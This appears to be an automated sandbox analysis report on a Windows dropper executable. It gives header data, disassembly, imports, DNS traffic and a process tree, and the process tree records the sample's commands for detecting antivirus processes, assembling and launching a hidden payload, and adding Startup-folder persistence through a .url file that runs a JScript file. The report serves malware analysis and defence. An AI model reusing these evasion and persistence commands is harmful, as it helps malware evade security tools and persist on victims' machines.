                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                    Instruction
                                                    sub esp, 000002D4h
                                                    push ebx
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    xor ebp, ebp
                                                    pop esi
                                                    mov dword ptr [esp+18h], ebp
                                                    mov dword ptr [esp+10h], 00409268h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [00408030h]
                                                    push 00008001h
                                                    call dword ptr [004080B4h]
                                                    push ebp
                                                    call dword ptr [004082C0h]
                                                    push 00000008h
                                                    mov dword ptr [00472EB8h], eax
                                                    call 00007FD38C8C2ACBh
                                                    push ebp
                                                    push 000002B4h
                                                    mov dword ptr [00472DD0h], eax
                                                    lea eax, dword ptr [esp+38h]
                                                    push eax
                                                    push ebp
                                                    push 00409264h
                                                    call dword ptr [00408184h]
                                                    push 0040924Ch
                                                    push 0046ADC0h
                                                    call 00007FD38C8C27ADh
                                                    call dword ptr [004080B0h]
                                                    push eax
                                                    mov edi, 004C30A0h
                                                    push edi
                                                    call 00007FD38C8C279Bh
                                                    push ebp
                                                    call dword ptr [00408134h]
                                                    cmp word ptr [004C30A0h], 0022h
                                                    mov dword ptr [00472DD8h], eax
                                                    mov eax, edi
                                                    jne 00007FD38C8C009Ah
                                                    push 00000022h
                                                    pop esi
                                                    mov eax, 004C30A2h
                                                    push esi
                                                    push eax
                                                    call 00007FD38C8C2471h
                                                    push eax
                                                    call dword ptr [00408260h]
                                                    mov esi, eax
                                                    mov dword ptr [esp+1Ch], esi
                                                    jmp 00007FD38C8C0123h
                                                    push 00000020h
                                                    pop ebx
                                                    cmp ax, bx
                                                    jne 00007FD38C8C009Ah
                                                    add esi, 02h
                                                    cmp word ptr [esi], bx
                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ C ] VS2010 SP1 build 40219
                                                    • [RES] VS2010 SP1 build 40219
                                                    • [LNK] VS2010 SP1 build 40219
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x1e898.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xf40000x1e8980x1ea0034eb4b5442afecdb4d25529894ddb814False0.03270886479591837data0.3626277943818537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1130000xf320x100080b2788b8bb2dc8c3af02ada6000736dFalse0.045654296875data0.3620189715935393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xf42200x11028Device independent bitmap graphic, 128 x 256 x 32, image size 69632EnglishUnited States0.02018027328051441
                                                    RT_ICON0x1052480x9928Device independent bitmap graphic, 96 x 192 x 32, image size 39168EnglishUnited States0.02583656396653744
                                                    RT_ICON0x10eb700x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.05014239218877136
                                                    RT_ICON0x1111d80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.07126593806921676
                                                    RT_DIALOG0x1123000x100dataEnglishUnited States0.5234375
                                                    RT_DIALOG0x1124000x11cdataEnglishUnited States0.6056338028169014
                                                    RT_DIALOG0x1125200x60dataEnglishUnited States0.7291666666666666
                                                    RT_GROUP_ICON0x1125800x3edataEnglishUnited States0.8225806451612904
                                                    RT_MANIFEST0x1125c00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                    DLLImport
                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 18, 2024 15:21:56.777230978 CET6237353192.168.2.71.1.1.1
                                                    Dec 18, 2024 15:21:56.998159885 CET53623731.1.1.1192.168.2.7
                                                    Dec 18, 2024 15:22:12.161611080 CET5358053192.168.2.71.1.1.1
                                                    Dec 18, 2024 15:22:12.299993992 CET53535801.1.1.1192.168.2.7
                                                    Dec 18, 2024 15:22:32.541296005 CET5750753192.168.2.71.1.1.1
                                                    Dec 18, 2024 15:22:32.678602934 CET53575071.1.1.1192.168.2.7
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 18, 2024 15:21:56.777230978 CET192.168.2.71.1.1.10x3b98Standard query (0)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrzA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 15:22:12.161611080 CET192.168.2.71.1.1.10xdb7eStandard query (0)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrzA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 15:22:32.541296005 CET192.168.2.71.1.1.10x9937Standard query (0)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrzA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 18, 2024 15:21:56.998159885 CET1.1.1.1192.168.2.70x3b98Name error (3)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrznonenoneA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 15:22:09.274910927 CET1.1.1.1192.168.2.70x44ecNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 15:22:09.274910927 CET1.1.1.1192.168.2.70x44ecNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 15:22:12.299993992 CET1.1.1.1192.168.2.70xdb7eName error (3)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrznonenoneA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 15:22:32.678602934 CET1.1.1.1192.168.2.70x9937Name error (3)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrznonenoneA (IP address)IN (0x0001)false

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:09:21:49
                                                    Start date:18/12/2024
                                                    Path:C:\Users\user\Desktop\PkContent.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\PkContent.exe"
                                                    Imagebase:0x400000
                                                    File size:830'415 bytes
                                                    MD5 hash:87C051A77EDC0CC77A4D791EF72367D1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:21:50
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:09:21:50
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:09:21:53
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:tasklist
                                                    Imagebase:0x510000
                                                    File size:79'360 bytes
                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:09:21:53
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /I "wrsa opssvc"
                                                    Imagebase:0x7a0000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:09:21:53
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:tasklist
                                                    Imagebase:0x510000
                                                    File size:79'360 bytes
                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:09:21:53
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                    Imagebase:0x330000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:09:21:54
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c md 724598
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:09:21:54
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /V "WowLiberalCalOfficer" Weight
                                                    Imagebase:0x7a0000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:09:21:54
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:09:21:55
                                                    Start date:18/12/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                                    Wow64 process (32bit):true
                                                    Commandline:Thermal.pif y
                                                    Imagebase:0x120000
                                                    File size:893'608 bytes
                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 8%, ReversingLabs
                                                    Has exited:false

                                                    Target ID:13
                                                    Start time:09:21:55
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:choice /d y /t 5
                                                    Imagebase:0x3f0000
                                                    File size:28'160 bytes
                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:09:21:56
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:09:21:56
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:11:19:28
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
                                                    Imagebase:0x7ff680350000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:11:19:29
                                                    Start date:18/12/2024
                                                    Path:C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
                                                    Imagebase:0x10000
                                                    File size:893'608 bytes
                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 8%, ReversingLabs
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:17.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:20.7%
                                                      Total number of Nodes:1526
                                                      Total number of Limit Nodes:33
                                                      execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 